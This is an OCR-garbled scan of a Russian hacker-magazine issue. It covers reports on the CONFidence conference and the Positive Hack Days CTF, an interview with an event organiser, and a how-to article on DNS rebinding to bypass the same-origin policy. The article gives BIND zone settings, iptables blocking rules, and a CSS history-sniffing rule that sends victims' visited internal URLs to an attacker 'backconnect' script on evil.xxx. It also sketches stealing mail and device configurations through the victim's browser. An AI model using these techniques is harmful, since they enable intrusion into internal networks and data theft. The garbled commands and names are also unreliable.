Но вот как это сделать, если бТАС-интерфейс заблокирован? Сб 
этом и был доклад. Для начала нам понадобится азотная кислота, 
ну или серная... Да! Именно так начинается этот «хак»... 

В слайдах ты много инфы не найдешь. В основном схемы и картин- 
ки, поэтому вот тебе текст — Ьі1:.[ѵ/кЕ5]НѴ . Кстати, одним из этапов 
взлома был анализ с использованием достаточно дорого обору- 
дования, которого у автора доклада не было. Зато оно оказалось у 
его друзей в близлежащей лаборатории колледжа. В общем, ящик 
пива решил проблему доступа к этому оборудованию :). От себя 
отмечу: интересно было бы аналогичным методом поломать еТоке- 
ны или РуТокены... 

Оиіго 

Конечно, про многие доклады я не рассказал, хотя были и еще 
очень интересные темы, например, про фреймворк ВееГ. В любом 
случае все (почти все) материалы доступны на 201 1 .сопГсІепсе. 
огд.рі/таіегіаіз (и на нашем диске — прим, редактора). Жаль, 
что наших соотечественников практически нет на таких конфе- 
ренциях, ведь понятие «повышение квалификации» включает 
в себя поездки на такие мероприятия. Мы всячески призываем 
всех участвовать не только в СОМЕісІепсе, но и в других междуна- 
родных конференциях. А то у большинства людей складывается 
впечатление, что в нашей стране живут одни киберпреступники в 
медвежьих шкурах. Предлагаем всем помочь изменить этот сло- 
жившийся стереотип. Радует хотя бы то, что наши ребята уже идут 
по верному пути. Так, например, прошедший тоже в мае форум РЕЮ 
является, фактически, первым подобным мероприятием в России 
такого формата: с хакерской атмосферой, реальными техническими 
докладами и соревнованиями (до этого только Сбаоз Сопзігисііопз 
радовал умы). То ли еще будет. В этом же месяце в России откры- 
лась первая официальная группа ВеФоп (в Санкт-Петербурге), где 
каждый может рассказать про свой опыт и послушать других, а 
также помочь в создании открытой международной конфы по ИВ на 
территории нашей родины. Так что все будет отлично! 



■ Почему СОМРісІепсе? 

Мероприятие сильно отличается от многих другихтем, что оно 
сильно ушло вперед по числу докладов от русскоязычных ис- 
следователей среди остальных международных конференций. И 
причина здесь кроется не только в территориальном расположе- 
нии (Восточная Европа), но и в атмосфере самой конференции 
и отношении организаторов. Последние хорошо понимают, что 
исследователи с некоммерческими докладами (а других на кон- 
ференции замечено и не было) зачастую не могут позволить себе 
оплатить перелет и проживание. Хорошо, когда родная компания 
может взять издержки на себя, но в нашей странетакое случается 



по-прежнему нетак часто. Поэтому отдельно хочется рассказать 
о подходе организаторов к этим вопросам. Так, если твой доклад 
принят, то тебе оплачивают билет на самолет, проживание в отеле 
и даже такси из аэропорта и обратно. Ежедневно организовывают 
специальные ужины для докладчиков, которые проходят в разных 
интересных ресторанах города. Короче говоря, докладчиков здесь 
любят. Имей в виду, что в ближайшее время должен быть запущен 
прием тезисов на осеннее мероприятие СОМЕісІепсе. Если в мае 
эта конференция традиционно проходит в Кракове, то в сентябре 
фигурирует, как правило, какой-нибудь еще из примечательных 
городов Восточный Европы. 
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Позитивный СТР 



@ 19 мая в клубе «Молодая гвардия» в рамках форума по 
информационной безопасности РозШѵе Наск Пауз, организованного 
компанией РозШѵе ТееНпоІодіез, прошли международные 
соревнования хакеров СТР. 10 команд из России, США, Индии и 
Франции 8 часов подряд демонстрировали мастерство в сетевых 
атаках и защите собственных сервисов. 



Антураж 

Светящийся пол зала, в котором проходили состязания, зловеще 
озарял их напряженные лица. Провода опутывали столы, соз- 
давая ощущение непреодолимой ловушки. Табло сотрясалось. 
Организаторы сделали все, чтобы участники чувствовали себя как 
на кибернетической войне. 

Подобные интеллектуальные соревнования, в которых оценивает- 
ся умение атаковать и защищать компьютерные системы, весьма 
популярны во всем мире. В последние несколько лет они стали 
проводиться и в России. Розіііѵе Наск Вауз СТР один из самых 
масштабных у нас в стране, кроме того, содержит в себе ряд совер- 
шенно уникальных элементов. 

Организаторы предложили необычный формат соревнований, 
объединив классический СТР и НаскОиезТ Условия игры соче- 
тают в себе ѵѵЫіеЬох (участники имеют полный доступ к системе) 
и ЫаскЬох-сервисы (нет изначальной информации о системе). 
Состязания были очень напряженными и динамичными. Заданий 
было, пожалуй, слишком много для отведенного времени, поэто- 



му участникам буквально некогда было утереть пот со лба или 
отвлечься на еду. Задания охватывали все направления ИБ — 
реверсинг, безопасность веб-приложений, безопасность опера- 
ционных систем, безопасность прикладных сервисов и т.п., а для 
любителей классических СТР были также предложены задания из 
разряда «угадайка», поэтому каждый участник мог проявить себя 
и получить удовольствие от «разнообразия вкусов». 

Суть соревнования 

Суть игры заключалась в том, что каждая из команд получила 
в свое распоряжение компьютерную систему, инфраструктуру 
из виртуальных серверов, в которой было оставлено несколько 
уязвимостей и набор «флагов» — уникальных идентификаторов. 
Роль флага исполняла особая строчка программного кода. Задача 
участников — защищать свою систему от других команд, устраняя 
уязвимости, атаковать их системы и захватывать флаги. Сложность 
соревнованию также придавало то, что сервисы регулярно изме- 
няли свое состояние и вместе с этим появлялись новые уязвимо- 
сти, а старые исчезали. 
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Успешной считалась атака, которая при- 
водит к получению на атакуемой системе 
заветного ключа. За такую атаку, завер- 
шенную регистрацией найденного во вра- 
жеской системе флага, команда получала 
конкурсные очки, а их соперники, прошля- 
пившие штурм, штрафовались. При этом 
нельзя было выполнять любые деструктив- 
ные действия, как против соперников, так 
и против системы конкурса. Все действия 
участников фиксировались системой и 
выводились на конкурсные табло. 

Все заложенные уязвимости были не 
вымышлены, как в большинстве дру- 
гих СТР, а взяты из реальной жизни. 
Например, в качестве конкурсного ПО 
организаторы разработали прототип 
системы класса 5САВА (систем, с помо- 
ідью которых обычно управляются различ- 
ные промышленные объекты). 

Виде одна изюминка соревнований заклю- 
чалось в том, что они сопровождались кра- 
сивой легендой, все задания были встрое- 
ны в одну сюжетную линию, а при смене 
заданий показывались соответствуюідие 
видеоклипы. 

Согласно легенде, международная кос- 
мическая экспедиция обнаружила в 
окрестностях Юпитера таинственный моно- 
лит, имеюідий форму параллелепипеда. 
Находку назвали РНО (Рагаііеіеріресі НаЬіІе 
Веі'іесііѵе). Когда монолит попытались 
исследовать, его копии непостижимым 
образом появились во всех ведуідих 
странах мира. Исследователи, профессор 
Анисимис и доктор Павлов, изучили явле- 
ние и пришли к выводу, что РНО является 
огромным распределительным транс- 



форматором, аккумулируюідим энергию 
космического излучения и передаюідим ее 
своим земным копиям. В результате разви- 
тия копии монолита могут покрыть потреб- 
ности человечества в энергоресурсах на 
сотни лет вперед. Кроме этого, проекции 
могут обмениваться информацией через 
интернет. Риде одной экстраординарной 
особенностью является то, что монолиты 
блокируют весь мировой военный потенци- 
ал. И вот, каждая страна собирает элитную 
команду хакеров для разрушения моноли- 
тов вражеских государств с помоидью сете- 
вых атак и заидиты собственных... 

Итоги конкурса 

Больше всех конкурсных очков получила 
команда из университета Карнеги-Мелона 
в Питсбурге (США) РІаісІ Рагііатепі; о1" 
Рѵѵпіпд (РРР) и забрала призовые 5 тысяч 
долларов. Второе место заняла команда 
Рее! Моге из Санкт-Петербургского госу- 
дарственного университета информацион- 
ных технологий, механики и оптики (приз — 
3 тысячи долларов). Третьей стала команда 
екатеринбуржцев НаскегВот из Уральского 
государственного университета, забрав 2 
тысячи долларов. 

По мнению ведуидего СТР Дмитрия Евтеева, 
команда из США заняла первое место с 
большим отрывом по следуюидим причи- 
нам: 

• Они в большей степени были сконцентри- 
рованы на инфраструктуре СТР, и это наи- 
более правильная стратегия. В следуюидем 
году на РНВАУ5 СТР 2012 условия немного 
поменяется, и единственно верного под- 
хода уже не будет. Организаторы предложат 



несколько равнозначных по очкам страте- 
гий. 

• При нахождении уязвимостей, в отличие 
от своих конкурентов, РРР автоматизирова- 
ла эксплоит для массового сбора ключей с 
инфраструктур команд соперников. 

• Команда РРР хорошо и вовремя заидиида- 
ла свои сервисы, поэтому потеряла очень 
мало очков при нападениях соперников. 

• Студенты из США внимательно сле- 
дили за доступностью своих сервисов, 
тем самым получили минимальное число 
штрафных баллов. 

• Американцы ранее много участвовали в 
соревнованиях типа СТР. «Это не первый 
наш опыт участия в соревнованиях СТР, 
но на РНВ СТР нам впервые пришлось не 
только взламывать чужие ресурсы, но и 
заидиидать собственные. Мы с удовольстви- 
ем примем участие в следуюидем году», — 
рассказывает один из членов команды. 
Участники команды РРР приехали в 
Россию впервые и, кроме посеидения 
РНВауз, успели погулять по центру 
Москвы и Измайловскому парку и взгля- 
нуть на главное здание МГУ. Русские 

СТР удивили их своей необычностью: 

«Мы были поражены, когда попали в то 
место, где проводились СТР. Мало того, 
что это был ночной клуб, а не стандарт- 
ный конференц-зал, но все, что там было, 
выглядело захватываюиде. Соревнования 
были отлично организованы. У нас было 
не только уйма задач, но еиде перед каж- 
дым новым обновлением организаторы 
показывали пугаюидие видеоклипы, а сами 
обновления передавались нам в конвертах 
с пометкой «Совершенно секретно». 
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Сергей Гордейчик, технический директор 
Розіііѵе Тесппоіодіез 

- РНО — довольно необычное мероприятие для российского 
ИТ-рынка. Как в принципе пришла в голову мысль организовать 
подобное событие? 

Мысль витала в воздухе уже давно, 
причем не только в наших голо- 
вах. В последнее время появилось 
множество инициатив по измене- 
нию форматов мероприятий, наши 
коллеги пытаются сделать что-то 
необычное. Осенью прошлого года 
мы поняли, что на рынке чего-то 
не хватает, не хватает тривиальных 
веідей, которые были бы инте- 
ресны нам и людям, с которыми 
мы обідаемся. Что это за веіди, 
мы особо не понимали и оконча- 
тельно их список сформировался, 
наверно, на корпоративной вечеринке по случаю НГ, где у нас, в 
основном, и приходят в голову все светлые идеи. В прошлом году 
именно на такой вечеринке мы придумали РизСгурІо СТР. В этом 
году сформировалась идея Розіііѵе Наск Вауз как консолидация 
всех активностей, которые мы до этого делали в рамках Рускрипто, 
ІпЬзесигіІуМозсоѵѵ, Сбаоз Сопзігисііопз, Инфобез и других меро- 
приятий. 

- Если идея РНО оформилась в новый год, как удалось подгото- 
виться всего за 4 месяца? 

Мы недавно размышляли о развитии Розіііѵе Наск Вауз. Думали, 
как его можно сделать с меньшим уідербом для компании, чтобы 
это было спокойно, планомерно и размеренно. И мы поняли, что 
если мы хотим делать мероприятие интересным и запоминаюідим- 
ся, то оно должно делаться на пределе возможностей. В этом году 
было, конечно, очень сложно, потому что от идеи и концепции бук- 
вально за 4 месяца нам нужно было довести мероприятие до его 



рабочего состояния. В последнее время большинство вовлеченных 
в организацию сотрудников спали по несколько часов в день, а 
некоторые не спали и совсем. Результат нас удовлетворяет на 70%, 
и это хорошо. Оставшиеся 30% — то, что не успели или не сдела- 
ли так, как хотели. С другой стороны, судя по обратной связи, по 
отзывам, то, что было сделано, превзошло ожидания, и это велико- 
лепно. 

- В следующем году будет все то же самое или программа будет 
расширена? 

Если делать из РозШѵе Наск Вауз повторяюідееся мероприятие, 
этакий медиапродукт, то можно ничего нового не делать. Но это 
будет неинтересно ни нам, ни участникам. Одна из огромных 
составляюідих РНВ, помимо социальной важности, продвижения и 
обмена информацией, — это удовольствие, которое мы получаем, 
делая такую, я считаю, грандиозную веідь. Поэтому, чтобы его было 
много, надо делать гораздо больше. Что конкретно будет измене- 
но, я не буду заранее говорить. Могу только сказать, что СТР будет 
просто грандиозный! Будут объединены в единое игровое про- 
странство зона СТР, плоідадка РНВ, интернет... Активности в рам- 
ках СТР будут дополнять друг друга, мы полностью переработаем 
визуализацию, пригласим больше команд. 

- Иностранных или русских? 

Всех! Что касается иностранцев, то уже сейчас Дмитрию Евтееву 
поступают заявки от тех команд, до которых мы не могли досту- 
чаться в этом году, есть ребята из Японии, Кореи, которым все это 
интересно, и они готовы приехать. Также мы будем приглашать 
много российских команд, в том числе начинаюідие команды, пото- 
му что для них это прекрасная возможность проверить свои силы в 
соревнованиях мирового уровня. 

- Что ты можешь сказать про уровень российских команд? 

В этом году СТР показал, что кроме первого все призовые места за 
нами. РРР в каком-то смысле повезло, но я уверен, наши ребята 
смогут вырваться вперед без проблем. Но, конечно, нужно много 
практики. 
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- Есть ли амбиции дорасти до Оеісоп? 

У нас нет желания делать «русский 
ВІаскНаІ;» или «Оекоп», потому что эти 
мероприятия — это продукты, устоявшиеся 
в своей канве. У России есть специфика, 
которая требует совершенно других под- 
ходов. 

- Какие принципиальные моменты выявил 
РНО, помогли он узнать что-то новое о 
российском ИТ-рынке? 

Большая проблема РНО, которую уже отме- 
чали, это бедность нашего сообідества. В 
качестве примера могу привести тот же 
конкурс «Ноутбук — взломай и уноси». Нам 
пришлось обратиться ко всему сообідеству, 
подключить личные связи, изучить спе- 
циализированные сайты, чтобы найти двух 
участников, из которых в результате при- 
шел только один. Конечно, есть слухи, что 
в России много хакеров, но они, видимо, 
где-то спрятались. Тоже касается и конфе- 
ренции. К сожалению, качественного прак- 
тического материала в России сейчас мало. 

- У Розіііѵе Наск Оауз немного спонсоров. 
Тема, что называется, «не пошла»? 

У нас не было задачи заработать на РНВ. 
Это облегчает многое, позволяет экспери- 
ментировать. И это не могло не отразиться 
и на спонсорской политике. Мы приглашали 
компании, которые могут помочь не только 
деньгами, но и внести в РНВ вклад свои- 
ми идеями. Так, Лаборатория Касперского 



приняла активное участие в подготовке 
деловой программы, Сізсо очень помогла 
с аппаратным обеспечением, Кабест помог 
сформировать бизнес-сообідество среди 
участников. Огромное им за это спасибо. 

- Что нужно сделать, чтобы ситуация изме- 
нилась? 

Нужно проводить больше Розіііѵе Наск 
Вауз! Чтобы люди выходили на свет, не боя- 
лись. Одна из задач РНО — показать, что 
хакер — тоже человек, что не стоит отно- 
ситься к поиску уязвимостей, к исследова- 
нию заидииденности как к какой-то страш- 
ной и опасной веиди. Это вполне понятная 
легитимная работа (ну иногда, может быть, 
нелегитимная, все зависит оттого, куда 
направить ее результаты). Главное, это веидь 
нужная и востребованная, что показал и 
интерес представителей бизнеса к тому, что 
происходило на мероприятии. Важно, что 
есть ребята, которые готовы развиваться в 
этом направлении. Это главный результат 
РНВ, помимо удовольствия. 

- Одной из главных целей РНО заявлялось 
налаживание связей между хакерами и 
бизнесом. Это удалось? 

Непосредственно к нам в компанию после 
Розіііѵе Наск Вауз устроилось 4 челове- 
ка. Другие вендоры, насколько я знаю, 
тоже вели активную кадровую политику на 
форуме. Есть интерес к некоторым СТР- 
командам со стороны Епіегргізе-компаний, 



которые пытаются с ними работать, постро- 
ить взаимоотношения в области исследо- 
вательских программ. Это важная веидь, 
потому что у нас, в отличие от всего мира, 
использование университетских команд, 
университетских лабораторий в реальном 
Р&В в области компьютерной безопасности 
практически нулевое. Здесь же, если эта 
тенденция получит развитие, то мы полу- 
чим то, о чем так долго говорят с высоких 
трибун, — связь производства с высшим 
образованием. Правда, смогут ли вузы 
построить РезеагсЬ & Веѵеіортепі; у себя, 
предоставлять законченный цикл услуг от 
исследования до компонентов продукта, — 
большой вопрос. 

В любом случае, это важная и полезная 
веидь, которой стоит заниматься. 

- Как можно выразить суть РНО? 

Недавно я обидался с человеком, который 
«не в теме», и наткнулся на Розібѵе Наск 
Вауз в интернете. Так вот, он воспринял 
это название не как связанное с Розіііѵе 
ТесЬпоІодіез, а как попытку восстановить 
какой-то позитивный имидж хакеров, пози- 
тивное отношение к этому слову, которое 
сейчас носит сугубо негативный оттенок. Мы 
же хотим показать, что хакеры это не столь- 
ко Бивис и Батхед или таинственные кибер- 
преступники, но и эксперты, мастера своего 
дела и любознательные ребята, которые 
хотят развиваться, хотят заниматься чем-то 
полезным, перспективным и нужным. -іг 
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Реализации атаки для обхода Заше огідіп роіісу 

@ Основой модели безопасности, заложенной в современные 
браузеры, является механизм «Заше огідіп роіісу». Суть его 
заключается в том, что браузеры не позволяют сценариям обращаться 
к данным, расположенным на стороннихдоменах. Исключение 
составляет лишь возможности передавать РОЗТ-запросы и подключать 
к странице файлы іаѵазсгірі и с$$. При зтом не существует никаких 
легальных способов читать данные, получаемые с другого домена. 



Обход ограничений 

Подумаем, чего конкретно можно было бы добиться, если бы огра- 
ничение на получение данных с других доменов удалось отменить. В 
первую очередь, мы получили бы возможность не только отправлять 
запросы на сторонние ресурсы (как при стандартных СБРР-атаках), 
но и обрабатывать ответы, полученные от сервера. А значит, боль- 
шая часть механизмов, предназначенных для заідиты от СБРР-атак, 
перестала бы работать. Мы могли бы получить доступ к ресурсам, 
расположенным во внутренней сети (недоступной извне), при этом 
браузер пользователя использовался бы в качестве прокси. Также 
можно было бы получать конфиденциальные данные с ресурсов, на 
которых пользователь проходит аутентификацию при помоіди серти- 
фикатов. Хорошим примером подобного веб-приложения для корпо- 
ративной среды является почтовый сервер ОиНоок ѴѴеЬ Ассезз. 
Именно для обхода ограничения «Бате огідіп роіісу» и было при- 
думано семейство атак Апіі ВМБ ріппіпд, также известное как ВМБ 
геЬіпбіпд. Атакам типа Апіі ВМБ ріппіпд подвержены веб-серверы, 
которые отвечают на НТТР-запросы с произвольным значением 
заголовка НозТ В частности, уязвимы все ѵѵеЬ-сервера Арасбе и 
ІІБ с конфигурацией по умолчанию. Также уязвимы практически все 



удаленные сервисы, управляемые по НТТР, но не имеюідие ѵѵеЬ- 
интерфейса. Например, уязвимы практически все сервисы, предо- 
ставляюідие удаленные АРІ с управлением при помоіди протоколов 
БОАР, ХМІ-РРС и подобных. 

В чем же суть? 

Современные браузеры, при получении странички с какого-либо 
сайта, кешируют результаты ОМБ-запроса. Это делается для предот- 
враідения отправки запросов к сторонним серверам посредством 
подмены ІР-адреса. Давай подумаем, что можно сделать для обхода 
этого механизма. Раньше атака (в теории) могла проводиться сле- 
дуюідим образом: 

1) Жертва обраідается к домену, принадлежаідему злоумышленнику. 

2) Получаете ВМБ-сервера ІР-адрес, соответствуюідий доменному 
имени. 

3) Обраідается на ѵѵеЬ-сервер (соответствуюідий полученному ІР) и 
получает с него сценарий )аѵазсгір1;. 

4) Полученный ^аѵазсгір1; через некоторое время после загрузки 
инициирует повторный запрос на сервер. 

5) В этот момент атакуюідий при помоіди межсетевого экрана бло- 
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кирует все запросы жертвы к серверу. 

6 ) Браузер пытается повторно узнать ІР-адрес сервера (послав 
соответствующий 0М5-запрос) и на этот раз получает ІР-адрес уяз- 
вимого сервера из локальной сети жертвы. 

Соответственно, если удастся заманить жертву на свой домен 
еѵіі.ххх, можно заставить браузер пользователя думать, что этому 
имени домена соответствует не ІР-адрес из внешнего интернета, 
а ІР-адрес из локальной сети. По этому адресу может, к примеру, 
располагаться какой-нибудь важный внутрикорпоративный ресурс. 
Проблема только в том, что этот вариант атаки не работает. 

Реализуем на практике 

Как можно понять из описания атаки, нам потребуется один сервер, 
на котором нужно поднять и настроить ѴѴЕВ- и ПМЗ-сервера, также 
потребуется домен, на который можно будет заманивать жертву. При 
регистрации доменного имени указываем в качестве М5-серверов 
данные нашего сервера. 

Для успешного проведения атаки на практике нужно сконфигури- 
ровать М5-сервер так, чтобы он возвращал оба ІР-адреса одновре- 
менно. Причем ІР-адрес сервера, на котором лежит ^аѵа5сгір1;, про- 
водящий атаку, должен возвращаться первым, а ІР-адрес сервера 
жертвы — вторым. В таком случае при обращении к домену браузер 
сначала загрузит атакующий скрипт с нашего сервера, лишь потом, 
когда сервер станет недоступным (в результате блокировки запроса 
межсетевым экраном), — обратится к серверу жертвы. 

Для этой цели вполне подходит сервер ВіпсІ 9. Чтобы он возвращал 
ІР-адреса в нужном порядке, его нужно собрать из исходных кодов 
с флагом --епаЫе-бхесІ-ггзеІ;. По умолчанию этот флаг не установ- 
лен, и версии, распространяемые в бинарниках, использовать не 
получится. В настройках ЬіпсІ9 указывается, что следует использо- 
вать фиксированный порядок следования ІР-адресов. Для этого в 
патесі.сопборііопз, в параметре орбопз указывается: 
ггзеі-огесіг { огбег бхеб; }; 

Далее нужно настроить зону. На примере домена сіпз. еѵіі.ххх: 

СІП5 А 97.246.251.93 

А 192.168.0.1 

В итоге, при обращении к ВМ5-серверу атакующего, для доме- 
на сіпз.аиаскег.ги браузер всегда будет обращаться сначала к 
ІР-адресу 97.246.251 .93, затем, если он недоступен, к 192.1 68.0.1 . 

В некоторых случаях этот порядок может нарушаться, подробнее 
описано ниже. 




Результат атаки на ОиІІоок \Л/еЬ Ассезз 



Помимо сервера ВМ8 для проведения атаки потребуется веб- 
сервер (в качестве примера рассмотрим АрасЬе), и удобный меха- 
низм блокирования входящих запросов на соединение с сервером. 
Для блокировки входящих запросов можно использовать межсете- 
вой экран ірІаЫез, и наиболее эффективным способом блокировки 
является отправка пакета с Іср-гезеі в ответ на попытку соедине- 
ния, иначе браузер будет тратить лишнее время в рамках таймаута 
ТСР-сессии на ожидание ответа от сервера. При помощи ірІаЫез 
это делается следующим образом: 

ір1;аЫе5 -А ІМРІІТ -5 [блокируемый ІР-адрес] -р 1;ср \ 

--сірогі; 80 КЕЗЕСТ - -гезес1:-ыі1:Іі 1:ср-ге5е1; 

В примере сознательно блокируется только 80-й порт, так как для 
реализации атаки понадобится сервис, на который будут отправ- 
ляться полученные от клиента данные. В итоге атака выглядит сле- 
дующим образом: 

1 ) Жертва обращается к домену сІпз. еѵіі.ххх. 

2 ) ВМ5-сервер атакующего возвращает оба ІР-адреса в фиксиро- 
ванном порядке. 

3 ) Браузер перенаправляет запрос к серверу, расположенному на 
внешнем ІР 97.246.251 .93. 

4 ) Сервер возвращает НТМБ-страничку с ЗаѵаЗсгірІ’ом. 

5 ) После загрузки странички в браузере, клиентский ]аѵа5сгірІ шлет 
запрос к домену сіпз. еѵіі.ххх. 

6 ) После получения запроса серверный скрипт блокирует входящие 
соединения с ІР-адреса жертвы. 

7 ) Через некоторое время клиентский скрипт снова обращается к 
домену сіпз.аііаскег.ги и, поскольку сервер 97.246.251 .93 возвраща- 
ет Р5Т, запрос перенаправляется на локальный сервер 192.168.0.1. 
Теперь наш ]аѵа5сгірІ может слать любые 6ЕТ/Р08Т/НЕА0-запросы 
к приложению, расположенному на адресе 97.246.251.93, а также 
обрабатывать полученные ответы и отправлять результаты атакую- 
щему! 

Полезная нагрузка 

Итак, браузер думает, что скрипт был загружен с ресурса из вну- 
тренней сети, и у нас есть возможность этим ресурсом управ- 
лять. Какие задачи этот скрипт должен выполнить для получения 
практической пользы? Во-первых, скрипт должен определить, с 
каким конкретно приложением мы имеем дело, затем — есть ли 
какая-нибудь авторизация, которую придется обходить. После этого 
скрипт должен выполнить команды, заложенные в нем для данного 
типа оборудования. К примеру, изменить конфигурацию или полу- 
чить копию писем/документов, хранящихся на уязвимом сервере. 
После выполнения жестко заданных команд, можно переключить 
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взлом 




Процесс авторизации в приложении ОѴѴА 

браузер жертвы в режим прокси-сервера и дать возможность ата- 
кующему слать запросы к приложению в режиме опііпе. 

До выполнения всех этих задач нужно разобраться с тем, как 
скрипт будет отправлять запросы к уязвимому приложению, и как 
будет происходить передача полученных данных на сервер атаку- 
ющего. Не забываем о том, что ограничения 5ате Огідіп Роіісу мы 
уже обошли, а значит, для общения скрипта с уязвимым сервером 
можно использовать стандартные А^АX-теxнологии, в частности 
компонент ХМІНирРериезІ;. 

С передачей полученных данных на сервер сложнее, так как 
сервер управления процессом атаки (административная панель 
атакующего) располагается либо на другом домене, либо на 
другом порту (80-й порт на своем сервере мы заблокировали). 

Это значит, что скрипт снова столкнется с ограничениями Эаппе 
Огідіп Роіісу. К счастью, для решения этой проблемы была при- 
думана технология под названием 05ОМР, использование которой 
позволит отправлять запросы на наш сервер, если тот будет воз- 
вращать специальным образом подготовленные ответы (подроб- 
нее о 850МР можно прочитать на ресурсах, посвященных ѵѵеЬ- 
программированию). С механизмами все ясно, идем дальше. 

Выполнение команд 

При отправке команд на атакуемый сервер следует либо исполь- 
зовать ХМІНіІрРедиезІ в синхронном режиме, либо синхронизи- 
ровать отправку команд вручную и не отправлять последующую 
команду до тех пор, пока не придет ответ на предыдущую. В целях 
повышения быстродействия работы скрипта я рекомендую исполь- 
зовать второй вариант. 

Для использования браузера жертвы в качестве прокси, нужно 
после окончания работы скрипта запустить функцию зеііпіегѵаі, в 
которую передать код, который будет запрашивать у управляющего 
сервера следующую команду, которую нужно запустить на атакуе- 
мом оборудовании. А результат выполнения команды можно пере- 
давать обратно на сервер. 

Атака на корпоративные сети 

Мы разобрались, что делать, если цель одна. Теперь надо разо- 
браться, как атаковать корпоративные сети целиком. Ну и в пер- 
вую очередь для проведения такой атаки необходимо научиться в 
приемлемое время определять ІР-адреса целей атаки. Во-вторых, 
нужно обеспечить возможность атаки нескольких целей за один 
сеанс работы пользователя. В-третьих, требуется возможность 
совершения распределенных атак на один и тот же сервер с 
нескольких браузеров, расположенных во внутренней сети компа- 
нии. И в-четвертых, необходима возможность отправки запросов 
на различные ІР-адреса при использовании браузера жертвы в 
качестве прокси (выше шла речь об отправке подобных команд 
только на один адрес). 




Атакуем методом ОМ5 РеЬіпсІіпд 



Целеуказание 

Для определения целей можно сканировать ІР-адреса сети по диа- 
пазону. Для этого можно пользоваться, к примеру, тегом ІРРАМЕ и 
событием опВоасІ. Другой вариант реализации — создавать объект 
Ітаде и при помощи опВоасІ определять, загрузилось ли изобра- 
жение. Для определения того, что по данному адресу ресурс не был 
обнаружен, можно пользоваться функцией зеіТіппеоиІ, которая по 
истечении некоторого времени будет проверять, создался ли объ- 
ект или нет, и если объект не создан — сигнализировать о том, что 
ресурс по данному адресу не найден. 

С использованием этого подхода связано несколько очевидных 
проблем: 

1 ) Прокси-сервер может возвращать ответ даже при отправке 
запроса на несуществующий ІР-адрес, и в результате метод опіоасі 
будет указывать на наличие даже несуществующих адресов. 

2 ) Потенциально большое количество ложных срабатываний при 
ошибках выбора значения таймаута. 

3 ) При большом значении таймаута и/или большом диапазоне 
перебираемых адресов подбор может занять значительное время. 
Для решения этих проблем можно воспользоваться другим методом 
определения целей. 

С55 Нізіогу Наск ѵ 2.0 

Несколько лет назад был предложен интересный способ опре- 
деления веб-адресов, которые посещал пользователь браузера. 
Суть метода заключается в том, что при помощи )аѵа5сгір1; можно 
узнать цвет ссылки, созданной на странице, и для ранее посе- 
щенных ссылок этот цвет отличается. 

Таким образом, сформировав список адресов, можно при помощи 
)аѵа5сгір1; создать тег <а> для каждого адреса из списка и сверить 
его цвет с цветом уже посещенной ссылки. Для простоты работы, 
цвета уже посещенных ссылок задаются явно при помощи С55. 
Прошло несколько лет, и эту уязвимость закрыли. Современные 
версии браузеров (даже ІЕ8) теперь всегда для ссылок про- 
граммно отдают цвет по умолчанию, даже если ранее ссылка 
была посещена. Впрочем, эту уязвимость все равно можно 
реализовать по-новому. Для этого жестко зададим массив про- 
веряемых ссылок, например: 

ѵаг Ііпкз = [ 

■Іі1:1;р://192.168.0.1', 

// 10 . 1 . 1 . 1 ' 

]; 



Для каждой ссылки в динамически создаваемый тег 5ТУЕЕ добавим 
С55-правило вида: 

А#ісІ : ѵІ5І1;есІ { Ьаск§гоипсІ:иг1( 'Іі1;1;р://асітіп.еѵі1.ххх:8080/ 
Ьаскоппес1;.рІір?иг1=Іі1;1;р://192.168.0.1' ); } 
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Окошко Ьа$іс-авторизации 



Получение конфигурации с оборудования СІ$со 



В итоге, при создании ссылки, которая была посещена, браузер 
попытается загрузить игі, указанный в адресе, а для непосещен- 
ной ссылки игі загружаться не будет. Таким образом на сервер 
можно передать информацию о посещенных ссылках, и этому 
виду атаки подвержены все актуальные на сегодня версии брау- 
зеров, в том числе и самые новые. 

Атака нескольких целей 

Для проведения атаки типа ВМ5 геЬіпсІіпд требуется произво- 
дить блокировку соединений со стороны пользователя, причем с 
учетом реакции современных браузеров эту блокировку следует 
производить еще во время ТСР ЬапсІзЬаке. Если блокировку про- 
водить уже после соединения, браузер не будет использовать 
альтернативный адрес. В частности, ІЕ и ЕігеЬх возвращают 
ответ 200 ОК с пустым телом ответа, а браузер Орега возвращает 
код ошибки 404 и не пытается соединиться с другим ІР-адресом. 
Таким образом, параллельная атака нескольких ресурсов одно- 
временно с использованием стандартного подхода невозможна. 
Для проведения атаки на несколько целей, можно выделить 
функции определения целей и выбора текущей цели в отдель- 
ную НТМЕ-страницу. При обнаружении цели, ее ІР-адрес будет 
передаваться на сервер, и серверный скрипт должен создать 
для атаки на нее соответствующий субдомен в таблице ВМ5. 
Например, для ір-адреса 192.168.0.1 можно создать субдомен 
1 92.1 68.0.1 .сіпз.еѵіі. XXX. Управляющая страница по адресу бИр:// 
сІпз.еѵіІ.ххх/сопІгоІ.ЫппІ должна создать іі'гате, в который будет 
загружен документ, содержащий клиентский скрипт проведе- 
ния атаки ВМ5 РеЬіпсІіпд, находящийся, к примеру, по адресу 
Ыір://1 92.1 68.0.1 . сіпз.еѵіі. ххх/геЬіпсІіпд.ЫппІ. 

Чтобы не приходилось добавлять виртуальные сайты в ходе атаки, 
нужно настроить виртуальный хост веб-сервера таким образом, 
чтобы для всех поддоменов отдавались одни и те же файлы. Это 
создает парадокс: сервер, осуществляющий атаку, будет сам уяз- 
вим для нее :). 

Полученная страница сообщает серверу, чтобы он обслуживал 
только ее запросы, запрашивает блокировку ір-адреса атакуемо- 
го, выполняет работу и отпускает блокировку. Вместе с этим сер- 
вер вновь разрешает запросы от жертвы. 

Полный алгоритм выглядит следующим образом: 

1 ) Система определения целей передает ір-адреса целей на сер- 
вер атакующего (допустим, 97.246.251.93). 



Блокируем пользователя при помощи ірІаЫез 




2 ) Управляющий скрипт на клиенте запрашивает доменное имя 
цели у сервера. 

3 ) Сервер создает ВМЭ-запись для субдомена, который будет 
использоваться для атаки на конкретный ІР-адрес. Пример: 

97.246.251.93.сІП5.еѵі1.ххх А 97.246.251.93 

А 192.168.0.1 

4 ) Управляющий скрипт указывает полученное имя домена в 
качестве параметра згс-тега ІЕРАМЕ. 

5 ) Документ, полученный с домена 1 92.1 68.0.1 .еѵіі.ххх запрашива- 
ет у сервера блокировку. 

6 ) Сервер перестает реагировать на запросы о получении адреса 
целей, и блокирует обращения с браузера жертвы на 80-й порт. 

7 ) Клиентский скрипт выполняет работу по получению нужных 
данных и управлению оборудованием. 

8 ) После окончания работы клиентский скрипт сообщает серверу, 
что блокировку можно освободить. 

9 ) Сервер освобождает блокировку и снова разрешает доступ с 
